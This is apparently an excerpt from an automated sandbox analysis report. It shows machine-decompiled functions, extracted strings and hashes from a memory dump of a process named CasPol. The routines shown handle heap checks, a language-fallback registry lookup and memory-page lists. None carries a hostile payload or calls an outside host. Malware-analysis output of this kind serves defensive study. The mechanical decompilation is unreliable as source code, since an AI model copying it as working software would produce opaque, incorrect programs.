											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x171874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0167D4F0(_t83, 0x1606c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0162B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1716378 = 1;
						asm("int3");
						 *0x1716378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                0x016d23e3
                                                                0x016d23e8
                                                                0x016d23eb
                                                                0x016d23ee
                                                                0x016d23f3
                                                                0x016d259b
                                                                0x016d259b
                                                                0x016d259d
                                                                0x016d25a3
                                                                0x016d25a3
                                                                0x016d23fb
                                                                0x016d2424
                                                                0x016d244f
                                                                0x016d2460
                                                                0x016d2451
                                                                0x016d2451
                                                                0x016d2456
                                                                0x016d2458
                                                                0x016d2458
                                                                0x016d245b
                                                                0x016d245b
                                                                0x016d2426
                                                                0x016d2431
                                                                0x016d2436
                                                                0x016d2443
                                                                0x016d2438
                                                                0x016d2438
                                                                0x016d2438
                                                                0x016d2445
                                                                0x016d2445
                                                                0x016d2463
                                                                0x016d2469
                                                                0x016d246f
                                                                0x016d2480
                                                                0x016d2495
                                                                0x016d24a1
                                                                0x016d24ce
                                                                0x016d24df
                                                                0x016d24d0
                                                                0x016d24d0
                                                                0x016d24d5
                                                                0x016d24d7
                                                                0x016d24d7
                                                                0x016d24da
                                                                0x016d24da
                                                                0x016d24a3
                                                                0x016d24b0
                                                                0x016d24b5
                                                                0x016d24c2
                                                                0x016d24b7
                                                                0x016d24b7
                                                                0x016d24b7
                                                                0x016d24c4
                                                                0x016d24c4
                                                                0x016d24e8
                                                                0x016d2497
                                                                0x016d249a
                                                                0x016d249a
                                                                0x016d2482
                                                                0x016d2488
                                                                0x016d2488
                                                                0x016d2471
                                                                0x016d2479
                                                                0x016d2479
                                                                0x016d24ef
                                                                0x016d23fd
                                                                0x016d2401
                                                                0x016d2412
                                                                0x016d2403
                                                                0x016d2403
                                                                0x016d2408
                                                                0x016d240a
                                                                0x016d240a
                                                                0x016d240d
                                                                0x016d240d
                                                                0x016d241b
                                                                0x016d241b
                                                                0x016d24f1
                                                                0x016d24f6
                                                                0x016d2507
                                                                0x016d2510
                                                                0x00000000
                                                                0x016d2510
                                                                0x016d250b
                                                                0x00000000
                                                                0x016d24f8
                                                                0x016d24f8
                                                                0x016d24fc
                                                                0x016d2500
                                                                0x016d2512
                                                                0x016d2515
                                                                0x016d251a
                                                                0x016d2521
                                                                0x016d2524
                                                                0x016d2529
                                                                0x016d252f
                                                                0x00000000
                                                                0x00000000
                                                                0x016d253c
                                                                0x016d255c
                                                                0x016d2561
                                                                0x016d253e
                                                                0x016d2554
                                                                0x016d2559
                                                                0x016d256a
                                                                0x016d256d
                                                                0x016d2574
                                                                0x016d2586
                                                                0x016d2588
                                                                0x016d258f
                                                                0x016d2590
                                                                0x016d2590
                                                                0x016d2597
                                                                0x00000000
                                                                0x016d2597

                                                                Strings
                                                                • HEAP[%wZ]: , xrefs: 016D254F
                                                                • HEAP: , xrefs: 016D255C
                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 016D256F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                • API String ID: 0-3815128232
                                                                • Opcode ID: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                                                                • Instruction ID: ebec3ea87910d809e6f3bcdc52a1e6736063465e59eb73d53716fb7e1b85440b
                                                                • Opcode Fuzzy Hash: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                                                                • Instruction Fuzzy Hash: 0C5103349012608AE375CF2ECC68B727BF1EB48645F55889DECC28B285D776D887DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E0162E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0162F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016695D0();
						}
						if(_t78 != 0) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0166FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0166BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01669600();
					if(_t97 < 0) {
						goto L6;
					}
					E0166BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0162F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0166BB40(_t83, _t102 + 0x24, _t78);
								if(L016343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0166BB40(_t84, _t102 + 0x24, _t94);
									if(L016343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                0x0162e620
                                                                0x0162e628
                                                                0x0162e62f
                                                                0x0162e631
                                                                0x0162e635
                                                                0x0162e637
                                                                0x0162e63e
                                                                0x01685503
                                                                0x01685503
                                                                0x0162e64c
                                                                0x0162e64c
                                                                0x0162e651
                                                                0x00000000
                                                                0x00000000
                                                                0x0162e661
                                                                0x0162e665
                                                                0x0168542a
                                                                0x0162e715
                                                                0x0162e71a
                                                                0x0162e71c
                                                                0x0162e720
                                                                0x0162e720
                                                                0x0162e727
                                                                0x0162e736
                                                                0x0162e736
                                                                0x0162e743
                                                                0x0162e743
                                                                0x0162e673
                                                                0x0162e678
                                                                0x0162e67d
                                                                0x0162e682
                                                                0x0162e685
                                                                0x0162e692
                                                                0x0162e69b
                                                                0x0162e6a3
                                                                0x0162e6ad
                                                                0x0162e6b1
                                                                0x0162e6b2
                                                                0x0162e6bb
                                                                0x0162e6bf
                                                                0x0162e6c0
                                                                0x0162e6c8
                                                                0x0162e6cc
                                                                0x0162e6d5
                                                                0x0162e6d9
                                                                0x00000000
                                                                0x00000000
                                                                0x0162e6e5
                                                                0x0162e6ea
                                                                0x0162e6f9
                                                                0x0162e70b
                                                                0x0162e70f
                                                                0x01685439
                                                                0x0168545e
                                                                0x0168545e
                                                                0x00000000
                                                                0x0168545e
                                                                0x0168543b
                                                                0x0168543e
                                                                0x01685440
                                                                0x01685445
                                                                0x01685472
                                                                0x01685475
                                                                0x0168548d
                                                                0x01685493
                                                                0x016854a9
                                                                0x00000000
                                                                0x00000000
                                                                0x016854ab
                                                                0x016854b4
                                                                0x016854bc
                                                                0x016854c8
                                                                0x016854de
                                                                0x016854fb
                                                                0x016854e0
                                                                0x016854e6
                                                                0x016854eb
                                                                0x016854eb
                                                                0x016854de
                                                                0x00000000
                                                                0x016854bc
                                                                0x01685477
                                                                0x0168547a
                                                                0x01685480
                                                                0x01685483
                                                                0x01685486
                                                                0x0168548b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168548b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01685447
                                                                0x01685447
                                                                0x01685447
                                                                0x01685447
                                                                0x0168544e
                                                                0x00000000
                                                                0x00000000
                                                                0x01685450
                                                                0x01685452
                                                                0x01685455
                                                                0x0168545a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168545c
                                                                0x0168546a
                                                                0x0168546d
                                                                0x0168546f
                                                                0x00000000
                                                                0x0168546f
                                                                0x0162e70f

                                                                Strings
                                                                • @, xrefs: 0162E6C0
                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0162E68C
                                                                • InstallLanguageFallback, xrefs: 0162E6DB
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                • API String ID: 0-1757540487
                                                                • Opcode ID: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                                                                • Instruction ID: 1ca0ffe770921a8ea183744744c34b990a89ae19c6b0f32f754d06765d11b189
                                                                • Opcode Fuzzy Hash: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                                                                • Instruction Fuzzy Hash: F251C1726053169BD710EF68C850A7BB3E9AF98714F040A6EF986D7340EB35D904CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E0164B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1718748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0162B150();
						__eflags =  *0x1717bc8;
						if(__eflags == 0) {
							E016E2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0164AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                0x0164b8f0
                                                                0x0164b8f2
                                                                0x0164b8f4
                                                                0x01692c4e
                                                                0x01692c50
                                                                0x01692c56
                                                                0x01692c5c
                                                                0x01692c60
                                                                0x01692c7f
                                                                0x01692c84
                                                                0x01692c62
                                                                0x01692c77
                                                                0x01692c7c
                                                                0x01692c8a
                                                                0x01692c8f
                                                                0x01692c94
                                                                0x01692c9c
                                                                0x01692ca5
                                                                0x01692ca5
                                                                0x01692c9c
                                                                0x01692c50
                                                                0x0164b8fa
                                                                0x0164b902
                                                                0x0164b921
                                                                0x0164b921
                                                                0x0164b924
                                                                0x0164b924
                                                                0x0164b927
                                                                0x00000000
                                                                0x00000000
                                                                0x0164b929
                                                                0x0164b92b
                                                                0x0164b92d
                                                                0x0164b940
                                                                0x00000000
                                                                0x0164b940
                                                                0x0164b932
                                                                0x0164b932
                                                                0x00000000
                                                                0x0164b932
                                                                0x00000000
                                                                0x0164b904
                                                                0x0164b904
                                                                0x0164b90a
                                                                0x0164b90c
                                                                0x0164b916
                                                                0x0164b919
                                                                0x0164b915
                                                                0x0164b915
                                                                0x0164b91b
                                                                0x0164b91b
                                                                0x00000000
                                                                0x0164b910

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                                                                • Instruction ID: 1c19a30d87cdb88cf0e422622f0380a4a9138c0db6e9af1084dd03b81237c4fb
                                                                • Opcode Fuzzy Hash: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                                                                • Instruction Fuzzy Hash: 7C11E2353055029FEB2DDB19CC94B36B7AAEF41621F29812DE40BCB381D730D881CB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E016EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E016EBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E016EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E016EAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01669730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E016EA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E016EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01669730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E016EA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E016EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01642280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0163B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0163FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01647D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E016DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                0x016ee547
                                                                0x016ee549
                                                                0x016ee54f
                                                                0x016ee553
                                                                0x016ee557
                                                                0x016ee55a
                                                                0x016ee55c
                                                                0x016ee55f
                                                                0x016ee561
                                                                0x016ee567
                                                                0x016ee56b
                                                                0x016ee7e2
                                                                0x00000000
                                                                0x016ee571
                                                                0x016ee575
                                                                0x016ee577
                                                                0x016ee57b
                                                                0x016ee57c
                                                                0x016ee57d
                                                                0x016ee57e
                                                                0x016ee57f
                                                                0x016ee588
                                                                0x016ee58f
                                                                0x016ee591
                                                                0x016ee592
                                                                0x016ee592
                                                                0x016ee596
                                                                0x016ee59e
                                                                0x016ee5a0
                                                                0x016ee5a6
                                                                0x016ee61d
                                                                0x016ee61d
                                                                0x016ee621
                                                                0x016ee623
                                                                0x016ee630
                                                                0x016ee630
                                                                0x016ee7e6
                                                                0x016ee7eb
                                                                0x016ee7ed
                                                                0x016ee7f4
                                                                0x016ee7fa
                                                                0x016ee7ff
                                                                0x016ee7ff
                                                                0x016ee80a
                                                                0x016ee812
                                                                0x016ee812
                                                                0x016ee5ab
                                                                0x016ee5b4
                                                                0x016ee5b9
                                                                0x016ee5be
                                                                0x016ee5c0
                                                                0x016ee5c2
                                                                0x016ee5c8
                                                                0x016ee5c9
                                                                0x016ee5cb
                                                                0x016ee5cc
                                                                0x016ee5d5
                                                                0x016ee5e4
                                                                0x016ee5f1
                                                                0x016ee5f8
                                                                0x016ee5f8
                                                                0x016ee5d5
                                                                0x016ee602
                                                                0x016ee616
                                                                0x016ee63d
                                                                0x016ee644
                                                                0x016ee64d
                                                                0x016ee652
                                                                0x016ee657
                                                                0x016ee659
                                                                0x016ee65b
                                                                0x016ee661
                                                                0x016ee662
                                                                0x016ee664
                                                                0x016ee665
                                                                0x016ee66e
                                                                0x016ee67d
                                                                0x016ee68a
                                                                0x016ee691
                                                                0x016ee691
                                                                0x016ee66e
                                                                0x016ee6b0
                                                                0x00000000
                                                                0x016ee6b6
                                                                0x016ee6bd
                                                                0x016ee6c7
                                                                0x016ee6d7
                                                                0x016ee6d9
                                                                0x016ee6db
                                                                0x016ee6de
                                                                0x016ee6e3
                                                                0x016ee6f3
                                                                0x016ee6fc
                                                                0x016ee700
                                                                0x016ee700
                                                                0x016ee704
                                                                0x016ee70a
                                                                0x016ee70a
                                                                0x016ee713
                                                                0x016ee716
                                                                0x016ee719
                                                                0x016ee720
                                                                0x016ee761
                                                                0x016ee76b
                                                                0x016ee774
                                                                0x016ee77a
                                                                0x016ee77a
                                                                0x016ee78a
                                                                0x016ee791
                                                                0x016ee799
                                                                0x016ee79b
                                                                0x016ee79f
                                                                0x016ee7aa
                                                                0x016ee7c0
                                                                0x016ee7ac
                                                                0x016ee7b2
                                                                0x016ee7b9
                                                                0x016ee7b9
                                                                0x016ee7c7
                                                                0x016ee806
                                                                0x00000000
                                                                0x016ee7c9
                                                                0x016ee7d1
                                                                0x016ee7d8
                                                                0x00000000
                                                                0x016ee7d8
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee722
                                                                0x016ee72e
                                                                0x016ee748
                                                                0x016ee74c
                                                                0x016ee754
                                                                0x016ee756
                                                                0x016ee75c
                                                                0x016ee75c
                                                                0x00000000
                                                                0x016ee75c
                                                                0x016ee758
                                                                0x016ee758
                                                                0x00000000
                                                                0x016ee758
                                                                0x016ee750
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee752
                                                                0x00000000
                                                                0x016ee752
                                                                0x016ee730
                                                                0x016ee735
                                                                0x016ee73d
                                                                0x016ee73f
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee741
                                                                0x016ee741
                                                                0x00000000
                                                                0x016ee741
                                                                0x016ee739
                                                                0x00000000
                                                                0x00000000
                                                                0x016ee73b
                                                                0x00000000
                                                                0x016ee73b
                                                                0x016ee722
                                                                0x016ee720
                                                                0x016ee6b0
                                                                0x016ee618
                                                                0x00000000
                                                                0x016ee618

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                • Instruction ID: ab0ec8ac83e067ef5419767d180b486fc131d4215f4ae32044b96e766b239ba6
                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                • Instruction Fuzzy Hash: DF9192312053429FEB24CF69CC49B27BBE6AF84714F148A2DF695CB290E776E904CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E016A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x17005f0);
				E0167D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016A53CA(0);
						return E0167D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
